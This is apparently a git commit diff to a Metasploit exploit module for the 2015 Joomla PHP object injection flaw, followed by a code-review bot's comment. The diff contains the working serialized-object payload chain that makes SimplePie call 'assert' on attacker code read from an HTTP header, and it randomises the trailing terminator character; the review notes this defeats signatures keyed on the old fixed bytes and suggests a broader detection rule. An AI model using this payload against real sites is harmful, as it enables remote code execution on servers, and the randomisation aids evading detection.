add random terminator and clarify target
parent
08d0ffd709
commit
8c43ecbfaf
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Joomla < 3.4.6', {}]],
|
||||
'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],
|
||||
'DisclosureDate' => 'Dec 14 2015',
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
|
@ -140,13 +140,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
# gets a random 4 byte UTF-8 character
|
||||
def get_terminator
|
||||
# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF
|
||||
[rand(0x10000..0x10ffff)].pack('U*')
|
||||
end
|
||||
|
||||
def get_payload(header_name)
|
||||
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
|
||||
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
||||
pre_pay = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
||||
pay = "eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;"
|
||||
middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
|
||||
post = "\xF0\x9D\x8C\x86"
|
||||
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
|
||||
post_pay = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
|
||||
t1000 = get_terminator
|
||||
return "#{pre}#{pre_pay}s:#{pay.length}:\"#{pay}#{post_pay}#{t1000}"
|
||||
end
|
||||
|
||||
def print_status(msg='')
|
||||
|
|
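Review bot: The new local `t1000` in get_payload and the one-line comment on get_terminator do not say what the trailing character is for, so the reason it must be a 4-byte code point is lost on the next maintainer. I would rename the local to `terminator` and extend the comment, for example `# random 4-byte UTF-8 character appended after the serialized object; presumably the stored value is cut off at this character, confirm`. The terminator also appears to be no longer the fixed `"\xF0\x9D\x8C\x86"`, so the comment should say that the value varies per request; detection content keyed on those four bytes will not match, and a rule that looks for any UTF-8 lead byte 0xF0–0xF4 in the header value is the sturdier signature. As a style point, idiomatic Ruby drops the `get_` prefix and the explicit `return` on the last line of get_payload.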